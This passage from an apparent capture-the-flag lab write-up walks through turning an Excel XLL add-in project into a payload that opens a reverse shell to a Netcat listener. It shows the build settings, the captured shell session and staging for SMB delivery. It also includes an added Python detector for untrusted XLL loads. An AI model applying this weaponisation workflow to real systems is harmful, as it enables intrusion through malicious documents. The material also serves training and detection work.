XLL


While there are many ways to generate an XLL payload, I will be using one from edparcell, which appears to be really well written. It’s a C++ project.

According to the GitHub repo, the Excel SDK is required for compilation, along with some additional configuration

Excel 2013 SDK


I will download the Excel 2013 SDK from Microsoft

Going through the installation process

PS C:\> tree 'C:\2013 Office System Developer Resources\'
Folder PATH listing
Volume serial number is 00000082 BC6A:6165
C:\2013 OFFICE SYSTEM DEVELOPER RESOURCES
└───Excel2013XLLSDK
    ├───DOC
    ├───INCLUDE
    ├───LIB
    │   └───x64
    ├───SAMPLES
    │   ├───EXAMPLE
    │   ├───FRAMEWRK
    │   └───GENERIC
    └───SRC

Excel 2013 SDK is installed to the C:\2013 Office System Developer Resources directory

XLL Payload


PS C:\Users\admin\source\repos> git clone https://github.com/edparcell/HelloWorldXll ; start HelloWorldXll/HelloWorldXll.sln
Cloning into 'HelloWorldXll'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 0), reused 15 (delta 0), pack-reused 0
Receiving objects: 100% (15/15), 8.44 KiB | 4.22 MiB/s, done.

Downloading the repo and opening the solution file, HelloWorldXll.sln

Now, I’m opening this solution in VS 2017, and it prompts me to retarget the projects. I won’t make any changes

There are 2 main source files; dllmain.cpp and HelloWorldXll.cpp

Opening the project properties and setting the Target Extension to .xll

I will then update the Additional Include Directories attribute to point to the installed Excel 2013 SDK

The Linker has to be updated as well. It needs to include the C:\2013 Office System Developer Resources\Excel2013XLLSDK\LIB\x64\XLCALL32.LIB file as an additional dependency

The project uses the xlAutoOpen() function for code execution. The PoC only opens a popup message saying “Hello world”. This must be changed

I first commented out the initial PoC part and created 2 functions: local_exec() for local testing and remote_exec() for code execution on the target machine

Build complete. The XLL file is available at C:\Users\admin\source\repos\HelloWorldXll\x64\Release\HelloWorldXll.xll

Local Testing


I transferred the newly compiled XLL payload to another Windows instance with Excel installed

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 4444
listening on [any] 4444 ...

I have a Netcat listener on port 4444

Double-clicking the XLL payload pops up a prompt on Excel

Enabling it

Excel hangs

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.1.1.2] from (UNKNOWN) [10.1.1.23] 50529
 
PS C:\Users\localUser\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : localdomain
   IPv4 Address. . . . . . . . . . . : 10.1.1.23
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.1.1.254
 
Ethernet adapter Bluetooth Network Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

A session has been established. Local testing complete
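
From the monitoring side, the local test above leaves a recognisable trail: Excel maps an .xll from a user directory and a shell then runs under it. The following is an added example, not part of the original write-up or of the HelloWorldXll project, that correlates those two events. The event records are constructed in the style of Sysmon Event ID 7 (image loaded) and Event ID 1 (process creation), and it assumes that the add-in starts a child process and that trusted add-ins are signed and live under the Office install directory.

```python
import ntpath

# Assumption: add-ins shipped with Office live under this directory and are signed.
TRUSTED_DIR = r"c:\program files\microsoft office"

# Constructed Sysmon-style events, oldest first (not captured from the lab).
# Event ID 7 = image loaded, Event ID 1 = process creation.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
EVENTS = [
    {"EventID": 7, "ProcessId": 4120, "Image": EXCEL, "Signed": "false",
     "ImageLoaded": r"C:\Users\localUser\Documents\HelloWorldXll.xll"},
    {"EventID": 1, "ProcessId": 5312, "ParentProcessId": 4120, "ParentImage": EXCEL,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 7, "ProcessId": 6600, "Image": EXCEL, "Signed": "true",
     "ImageLoaded": r"C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ANALYS32.XLL"},
    {"EventID": 1, "ProcessId": 7001, "ParentProcessId": 6600, "ParentImage": EXCEL,
     "Image": r"C:\Windows\splwow64.exe"},
]


def is_untrusted_xll_load(ev):
    """True when excel.exe maps an .xll that is unsigned or outside TRUSTED_DIR."""
    if ev.get("EventID") != 7:
        return False
    loaded = ev.get("ImageLoaded", "").lower()
    by_excel = ntpath.basename(ev.get("Image", "")).lower() == "excel.exe"
    trusted = loaded.startswith(TRUSTED_DIR + "\\") and ev.get("Signed") == "true"
    return by_excel and loaded.endswith(".xll") and not trusted


def find_xll_execution(events):
    """Correlate untrusted XLL loads with processes later spawned by that Excel PID."""
    alerts = {}  # Excel PID -> alert record
    for ev in events:
        if is_untrusted_xll_load(ev):
            alerts[ev["ProcessId"]] = {"excel_pid": ev["ProcessId"],
                                       "xll": ev["ImageLoaded"], "children": []}
        elif ev.get("EventID") == 1 and ev.get("ParentProcessId") in alerts:
            alerts[ev["ParentProcessId"]]["children"].append(ev["Image"])
    for alert in alerts.values():
        # A child process after the load means the add-in did more than register functions.
        alert["severity"] = "high" if alert["children"] else "medium"
    return list(alerts.values())


if __name__ == "__main__":
    for alert in find_xll_execution(EVENTS):
        print(alert)
```

The signed add-in loaded from the Office directory produces no alert, even though that Excel instance also spawns a child process.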

To Kali


Now that I have confirmed the code execution from the local testing above, I will transfer the XLL payload to Kali

Transfer is made via SMB. Delivery on standby